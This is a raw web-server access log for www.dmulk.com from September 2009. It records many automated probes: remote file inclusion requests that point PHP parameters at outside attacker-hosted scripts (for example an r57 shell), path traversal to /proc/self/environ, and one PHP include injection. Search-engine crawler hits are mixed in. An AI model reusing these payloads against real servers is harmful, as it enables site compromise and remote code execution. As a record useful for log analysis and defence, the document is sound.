59.27.95.144 - - [16/Sep/2009:13:04:07 -0700] "GET /logs/access_081026.log//blend_data/blend_common.php?phpbb_root_path=http://www.jahanradio.com/copyright.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.195.112.160 - - [16/Sep/2009:13:04:13 -0700] "GET /logs/access_080929.log HTTP/1.0" 200 65536 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
67.195.112.160 - - [16/Sep/2009:13:04:15 -0700] "GET /logs/access_090430.log HTTP/1.0" 200 65536 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
59.27.95.144 - - [16/Sep/2009:13:04:23 -0700] "GET /blend_data/blend_common.php?phpbb_root_path=http://www.jahanradio.com/copyright.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
59.27.95.144 - - [16/Sep/2009:13:04:23 -0700] "GET /logs//blend_data/blend_common.php?phpbb_root_path=http://www.jahanradio.com/copyright.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
59.27.95.144 - - [16/Sep/2009:13:04:23 -0700] "GET /logs/access_081026.log%20%20//blend_data/blend_common.php?phpbb_root_path=http://www.jahanradio.com/copyright.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
87.242.99.43 - - [16/Sep/2009:13:04:29 -0700] "GET /logs/access_080614.log%20%20/errors.php?error=http://www.semihow.com/sh/amboard/compile/default_basic/admin/mydb.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
87.242.99.43 - - [16/Sep/2009:13:04:29 -0700] "GET /logs/access_080416.log%20%20/errors.php?error=http://www.semihow.com/sh/amboard/compile/default_basic/admin/mydb.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
87.242.99.43 - - [16/Sep/2009:13:04:29 -0700] "GET /errors.php?error=http://www.semihow.com/sh/amboard/compile/default_basic/admin/mydb.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
87.242.99.43 - - [16/Sep/2009:13:04:29 -0700] "GET /logs/errors.php?error=http://www.semihow.com/sh/amboard/compile/default_basic/admin/mydb.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
59.27.95.144 - - [16/Sep/2009:13:04:35 -0700] "GET /logs/access_090101.log%20%20//blend_data/blend_common.php?phpbb_root_path=http://www.jahanradio.com/copyright.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.195.112.160 - - [16/Sep/2009:13:04:45 -0700] "GET /logs/access_080331.log HTTP/1.0" 200 0 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
66.221.195.250 - - [16/Sep/2009:13:04:56 -0700] "GET /logs/access_080319.log%20%20/sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://www.rainbow.by//data/id1.txt??? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
66.221.195.250 - - [16/Sep/2009:13:05:09 -0700] "GET /logs/access_080819.log%20%20/sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://www.rainbow.by//data/id1.txt??? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
63.249.159.4 - - [16/Sep/2009:13:05:35 -0700] "GET /home.php?pagina=http://larrys.interfree.it/bovsp.txt?&mode=id HTTP/1.1" 404 275 "-" "-" "www.dmulk.com"
63.249.159.4 - - [16/Sep/2009:13:05:35 -0700] "GET /logs/home.php?pagina=http://larrys.interfree.it/bovsp.txt?&mode=id HTTP/1.1" 404 275 "-" "-" "www.dmulk.com"
63.249.159.4 - - [16/Sep/2009:13:05:36 -0700] "GET /logs/access_081002.log%20/home.php?pagina=http://larrys.interfree.it/bovsp.txt?&mode=id HTTP/1.1" 404 275 "-" "-" "www.dmulk.com"
69.10.136.56 - - [16/Sep/2009:13:05:39 -0700] "GET /logs/access_080305.log/index.php?option=com_joomlaxplorer&task=rss&Itemid=&mosConfig_absolute_path=http://philen.byroe.net/~arabhack/jurekznitip/scan/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
147.202.47.222 - - [16/Sep/2009:13:07:26 -0700] "GET /logs/access_080531.log/modules/My_eGallery/index.php?basepath=http://space.jpl.nasa.gov/analog.txt??%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.831" "www.dmulk.com"
147.202.47.222 - - [16/Sep/2009:13:07:26 -0700] "GET /logs/modules/My_eGallery/index.php?basepath=http://space.jpl.nasa.gov/analog.txt??%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.831" "www.dmulk.com"
222.236.47.23 - - [16/Sep/2009:13:07:26 -0700] "GET /logs/access_080524.log/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.graveyardzombies.org//files/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
147.202.47.222 - - [16/Sep/2009:13:07:27 -0700] "GET /modules/My_eGallery/index.php?basepath=http://space.jpl.nasa.gov/analog.txt??%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.831" "www.dmulk.com"
222.236.47.23 - - [16/Sep/2009:13:07:27 -0700] "GET /logs/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.graveyardzombies.org//files/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.dmulk.com"
147.202.47.222 - - [16/Sep/2009:13:07:29 -0700] "GET /modules/My_eGallery/index.php?basepath=http://space.jpl.nasa.gov/analog.txt??%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.831" "www.dmulk.com"
147.202.47.222 - - [16/Sep/2009:13:07:29 -0700] "GET /logs/modules/My_eGallery/index.php?basepath=http://space.jpl.nasa.gov/analog.txt??%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.831" "www.dmulk.com"
147.202.47.222 - - [16/Sep/2009:13:07:29 -0700] "GET /logs/access_080531.log/modules/My_eGallery/index.php?basepath=http://space.jpl.nasa.gov/analog.txt??%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.831" "www.dmulk.com"
147.202.47.222 - - [16/Sep/2009:13:07:34 -0700] "GET /logs/access_080228.log/modules/My_eGallery/index.php?basepath=http://space.jpl.nasa.gov/analog.txt??%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.831" "www.dmulk.com"
147.202.47.222 - - [16/Sep/2009:13:07:37 -0700] "GET /logs/access_080228.log/modules/My_eGallery/index.php?basepath=http://space.jpl.nasa.gov/analog.txt??%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.831" "www.dmulk.com"
67.195.112.160 - - [16/Sep/2009:13:07:52 -0700] "GET /logs/access_090313.log HTTP/1.0" 200 0 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.6.18.216 - - [16/Sep/2009:13:08:17 -0700] "GET /bikes/dteel/2008_09_19/?D=A HTTP/1.0" 200 1116 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
222.236.47.23 - - [16/Sep/2009:13:08:24 -0700] "GET /logs/access_081127.log/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.graveyardzombies.org//files/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.61 (Macintosh; I; PPC)" "www.dmulk.com"
91.121.102.57 - - [16/Sep/2009:13:09:13 -0700] "GET /index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.invasaohacking.com/r57.txt????? HTTP/1.1" 200 8107 "-" "libwww-perl/5.803" "www.dmulk.com"
211.203.180.144 - - [16/Sep/2009:13:10:06 -0700] "GET /logs/access_080313.log/mosConfig_absolute_path=http://kowpa.x-y.net/bbs//skin/ggambo7002_board/idfx1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.203.180.144 - - [16/Sep/2009:13:10:21 -0700] "GET /logs/access_080313.log/index.php?option=com_joomlaxplorer&task=rss&Itemid=&mosConfig_absolute_path=http://kowpa.x-y.net/bbs//skin/ggambo7002_board/idfx1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
217.160.7.67 - - [16/Sep/2009:13:10:50 -0700] "GET ///skin/ggambo7002_board/comment_modify.php?dir=http://rox-crime2.no-ip.org:8080/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
217.160.7.67 - - [16/Sep/2009:13:10:50 -0700] "GET /logs////skin/ggambo7002_board/comment_modify.php?dir=http://rox-crime2.no-ip.org:8080/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
217.160.7.67 - - [16/Sep/2009:13:10:54 -0700] "GET /logs/access_090807.log%20%20////skin/ggambo7002_board/comment_modify.php?dir=http://rox-crime2.no-ip.org:8080/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
217.160.7.67 - - [16/Sep/2009:13:10:54 -0700] "GET /logs/access_090731.log%20%20////skin/ggambo7002_board/comment_modify.php?dir=http://rox-crime2.no-ip.org:8080/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
216.183.177.131 - - [16/Sep/2009:13:11:12 -0700] "GET /logs/access_080614.log/errors.php?error=http://www.semihow.com/sh/amboard/compile/default_basic/admin/mydb.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
216.183.177.131 - - [16/Sep/2009:13:11:12 -0700] "GET /logs/access_080416.log/errors.php?error=http://www.semihow.com/sh/amboard/compile/default_basic/admin/mydb.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
83.16.182.130 - - [16/Sep/2009:13:11:27 -0700] "GET /logs/access_090903.log/skin/ggambo7002_board/write.php?dir=http://www.vnshomecare.org/eng/images/id.png? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
212.98.171.91 - - [16/Sep/2009:13:11:43 -0700] "GET /logs/access_080319.log/sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://www.rainbow.by//data/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
212.98.171.91 - - [16/Sep/2009:13:11:43 -0700] "GET /logs/sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://www.rainbow.by//data/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
212.98.171.91 - - [16/Sep/2009:13:11:43 -0700] "GET /sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://www.rainbow.by//data/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
91.121.102.57 - - [16/Sep/2009:13:11:48 -0700] "GET /logs/access_080512.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.invasaohacking.com/r57.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
91.121.102.57 - - [16/Sep/2009:13:11:50 -0700] "GET /index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.invasaohacking.com/r57.txt????? HTTP/1.1" 200 8107 "-" "libwww-perl/5.803" "www.dmulk.com"
91.121.102.57 - - [16/Sep/2009:13:11:50 -0700] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.invasaohacking.com/r57.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.98.171.91 - - [16/Sep/2009:13:11:58 -0700] "GET /logs/access_080819.log/sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://www.rainbow.by//data/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
91.121.102.57 - - [16/Sep/2009:13:13:17 -0700] "GET /logs/access_080702.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.invasaohacking.com/r57.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
67.195.112.160 - - [16/Sep/2009:13:14:48 -0700] "GET /logs/access_080608.log HTTP/1.0" 200 0 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
67.195.112.160 - - [16/Sep/2009:13:15:34 -0700] "GET /logs/access_081218.log HTTP/1.0" 200 0 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
121.254.195.7 - - [16/Sep/2009:13:15:58 -0700] "GET /http://kpu.feelmuziq.com/comm/attach/idx? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
91.121.102.57 - - [16/Sep/2009:13:16:00 -0700] "GET /logs/access_080515.log/errors.php?error=http://www.invasaohacking.com/r57.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
91.121.102.57 - - [16/Sep/2009:13:16:00 -0700] "GET /errors.php?error=http://www.invasaohacking.com/r57.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
91.121.102.57 - - [16/Sep/2009:13:16:00 -0700] "GET /logs/errors.php?error=http://www.invasaohacking.com/r57.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
74.6.18.216 - - [16/Sep/2009:13:17:08 -0700] "GET /logs/access_080319.log HTTP/1.0" 200 1471726 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
221.143.40.39 - - [16/Sep/2009:13:17:13 -0700] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.mmbeauty.idv.tw//catalog/zxx.txt? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
221.143.40.39 - - [16/Sep/2009:13:17:13 -0700] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.mmbeauty.idv.tw//catalog/zxx.txt? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
221.143.40.39 - - [16/Sep/2009:13:17:13 -0700] "GET /logs/access_090409.log//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.mmbeauty.idv.tw//catalog/zxx.txt? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
221.143.40.39 - - [16/Sep/2009:13:17:14 -0700] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.mmbeauty.idv.tw//catalog/zxx.txt? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
221.143.40.39 - - [16/Sep/2009:13:17:14 -0700] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.mmbeauty.idv.tw//catalog/zxx.txt? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
221.143.40.39 - - [16/Sep/2009:13:17:14 -0700] "GET /logs/access_090409.log//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.mmbeauty.idv.tw//catalog/zxx.txt? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
91.121.102.57 - - [16/Sep/2009:13:17:30 -0700] "GET /logs/access_090508.log/errors.php?error=http://www.invasaohacking.com/r57.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.98.171.91 - - [16/Sep/2009:13:17:40 -0700] "GET /logs/access_080319.log%20%20/sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://www.rainbow.by//data/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
212.98.171.91 - - [16/Sep/2009:13:17:46 -0700] "GET /logs/access_080819.log%20%20/sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://www.rainbow.by//data/id1.txt??? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
193.231.187.33 - - [16/Sep/2009:13:18:03 -0700] "GET /logs/access_080513.log/index.php?option=com_facileforms&Itemid=&mosConfig_absolute_path=http://www.gsmch.org/club/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
193.231.187.33 - - [16/Sep/2009:13:18:06 -0700] "GET /index.php?option=com_facileforms&Itemid=&mosConfig_absolute_path=http://www.gsmch.org/club/chi.txt?? HTTP/1.1" 200 19824 "-" "libwww-perl/5.810" "www.dmulk.com"
193.231.187.33 - - [16/Sep/2009:13:18:06 -0700] "GET /logs/index.php?option=com_facileforms&Itemid=&mosConfig_absolute_path=http://www.gsmch.org/club/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
205.234.246.98 - - [16/Sep/2009:13:18:40 -0700] "GET /logs/access_080521.log%20//index.php?select=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "-" "www.dmulk.com"
205.234.246.98 - - [16/Sep/2009:13:18:40 -0700] "GET /logs/access_080521.log%20//index.php?select=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "-" "www.dmulk.com"
75.126.49.163 - - [16/Sep/2009:13:19:07 -0700] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://samhwaeng.com/bbs/skin/ruvin_cubic_l3/fx29id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
75.126.49.163 - - [16/Sep/2009:13:19:07 -0700] "GET /logs/access_090801.log//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://samhwaeng.com/bbs/skin/ruvin_cubic_l3/fx29id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
75.126.49.163 - - [16/Sep/2009:13:19:08 -0700] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://samhwaeng.com/bbs/skin/ruvin_cubic_l3/fx29id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.212.41.182 - - [16/Sep/2009:13:19:13 -0700] "GET /logs/access_090105.log%20//calendar.php?pg=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "-" "www.dmulk.com"
89.212.41.182 - - [16/Sep/2009:13:19:13 -0700] "GET /logs/access_080912.log%20//calendar.php?pg=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "-" "www.dmulk.com"
89.212.41.182 - - [16/Sep/2009:13:19:15 -0700] "GET /logs/access_090105.log%20//calendar.php?pg=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "-" "www.dmulk.com"
89.212.41.182 - - [16/Sep/2009:13:19:15 -0700] "GET /logs/access_080912.log%20//calendar.php?pg=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "-" "www.dmulk.com"
211.230.148.66 - - [16/Sep/2009:13:19:15 -0700] "GET /com_joom12pic=http://cyberparty.fileave.com/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.230.148.66 - - [16/Sep/2009:13:19:15 -0700] "GET /logs/access_071016.log//com_joom12pic=http://cyberparty.fileave.com/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.230.148.66 - - [16/Sep/2009:13:19:15 -0700] "GET /logs//com_joom12pic=http://cyberparty.fileave.com/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
75.126.49.163 - - [16/Sep/2009:13:19:23 -0700] "GET /logs/access_081201.log//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://samhwaeng.com/bbs/skin/ruvin_cubic_l3/fx29id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.230.148.66 - - [16/Sep/2009:13:19:57 -0700] "GET /logs//com_joom12pic=http://cyberparty.fileave.com/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.230.148.66 - - [16/Sep/2009:13:19:57 -0700] "GET /com_joom12pic=http://cyberparty.fileave.com/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.230.148.66 - - [16/Sep/2009:13:19:57 -0700] "GET /logs/access_071016.log//com_joom12pic=http://cyberparty.fileave.com/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
92.52.216.123 - - [16/Sep/2009:13:20:16 -0700] "GET /administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://www.kim-key.cn/bbs/data/id1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
92.52.216.123 - - [16/Sep/2009:13:20:16 -0700] "GET /logs//administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://www.kim-key.cn/bbs/data/id1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
92.52.216.123 - - [16/Sep/2009:13:20:16 -0700] "GET /logs/access_090524.log//administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://www.kim-key.cn/bbs/data/id1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
92.52.216.123 - - [16/Sep/2009:13:20:18 -0700] "GET /logs//administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://www.kim-key.cn/bbs/data/id1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
92.52.216.123 - - [16/Sep/2009:13:20:21 -0700] "GET /administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://www.kim-key.cn/bbs/data/id1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
92.52.216.123 - - [16/Sep/2009:13:20:21 -0700] "GET /logs/access_090524.log//administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://www.kim-key.cn/bbs/data/id1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
193.231.187.33 - - [16/Sep/2009:13:20:26 -0700] "GET /logs/access_080525.log/index.php?option=com_extcalendar&Itemid=&mosConfig_absolute_path=http://www.gsmch.org/club/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
193.231.187.33 - - [16/Sep/2009:13:20:27 -0700] "GET /index.php?option=com_extcalendar&Itemid=&mosConfig_absolute_path=http://www.gsmch.org/club/chi.txt?? HTTP/1.1" 200 19824 "-" "libwww-perl/5.810" "www.dmulk.com"
193.231.187.33 - - [16/Sep/2009:13:20:28 -0700] "GET /logs/index.php?option=com_extcalendar&Itemid=&mosConfig_absolute_path=http://www.gsmch.org/club/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
193.231.187.33 - - [16/Sep/2009:13:20:39 -0700] "GET /logs/access_080529.log/index.php?option=com_extcalendar&Itemid=&mosConfig_absolute_path=http://www.gsmch.org/club/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
67.195.112.160 - - [16/Sep/2009:13:20:53 -0700] "GET /logs/access_070907.log HTTP/1.0" 200 61100 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
67.195.112.160 - - [16/Sep/2009:13:20:55 -0700] "GET /logs/access_081214.log HTTP/1.0" 200 0 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
92.52.216.123 - - [16/Sep/2009:13:21:18 -0700] "GET /logs/access_090808.log//administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://www.kim-key.cn/bbs/data/id1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
200.121.169.156 - - [16/Sep/2009:13:21:19 -0700] "GET /logs/access_080525.log/index.php?option=com_extcalendar&Itemid=&mosConfig_absolute_path=http://www.gsmch.org/club/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.231.187.33 - - [16/Sep/2009:13:21:19 -0700] "GET /logs/access_080515.log/index.php?option=com_facileforms&Itemid=&mosConfig_absolute_path=http://www.gsmch.org/club/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
200.121.169.156 - - [16/Sep/2009:13:21:21 -0700] "GET /index.php?option=com_extcalendar&Itemid=&mosConfig_absolute_path=http://www.gsmch.org/club/chi.txt?? HTTP/1.1" 200 19824 "-" "libwww-perl/5.805" "www.dmulk.com"
200.121.169.156 - - [16/Sep/2009:13:21:22 -0700] "GET /logs/index.php?option=com_extcalendar&Itemid=&mosConfig_absolute_path=http://www.gsmch.org/club/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
92.52.216.123 - - [16/Sep/2009:13:21:24 -0700] "GET /logs/access_090808.log//administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://www.kim-key.cn/bbs/data/id1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
75.126.49.163 - - [16/Sep/2009:13:21:30 -0700] "GET /logs/access_090801.log%20%20//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://samhwaeng.com/bbs/skin/ruvin_cubic_l3/fx29id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
200.121.169.156 - - [16/Sep/2009:13:21:33 -0700] "GET /logs/access_080513.log/index.php?option=com_facileforms&Itemid=&mosConfig_absolute_path=http://www.gsmch.org/club/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.121.169.156 - - [16/Sep/2009:13:21:34 -0700] "GET /index.php?option=com_facileforms&Itemid=&mosConfig_absolute_path=http://www.gsmch.org/club/chi.txt?? HTTP/1.1" 200 19824 "-" "libwww-perl/5.805" "www.dmulk.com"
200.121.169.156 - - [16/Sep/2009:13:21:34 -0700] "GET /logs/access_080529.log/index.php?option=com_extcalendar&Itemid=&mosConfig_absolute_path=http://www.gsmch.org/club/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.121.169.156 - - [16/Sep/2009:13:21:34 -0700] "GET /logs/index.php?option=com_facileforms&Itemid=&mosConfig_absolute_path=http://www.gsmch.org/club/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
75.126.49.163 - - [16/Sep/2009:13:21:35 -0700] "GET /logs/access_081201.log%20%20//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://samhwaeng.com/bbs/skin/ruvin_cubic_l3/fx29id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.195.112.160 - - [16/Sep/2009:13:21:39 -0700] "GET /logs/access_080606.log HTTP/1.0" 200 0 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
82.179.196.195 - - [16/Sep/2009:13:21:41 -0700] "GET /logs/access_080304.log/error.php?dir=http://www.mmbeauty.idv.tw//catalog/zxx.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
82.179.196.195 - - [16/Sep/2009:13:21:41 -0700] "GET /error.php?dir=http://www.mmbeauty.idv.tw//catalog/zxx.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
82.179.196.195 - - [16/Sep/2009:13:21:41 -0700] "GET /logs/error.php?dir=http://www.mmbeauty.idv.tw//catalog/zxx.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.195.112.160 - - [16/Sep/2009:13:21:42 -0700] "GET /logs/access_080713.log HTTP/1.0" 200 0 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com" 82.1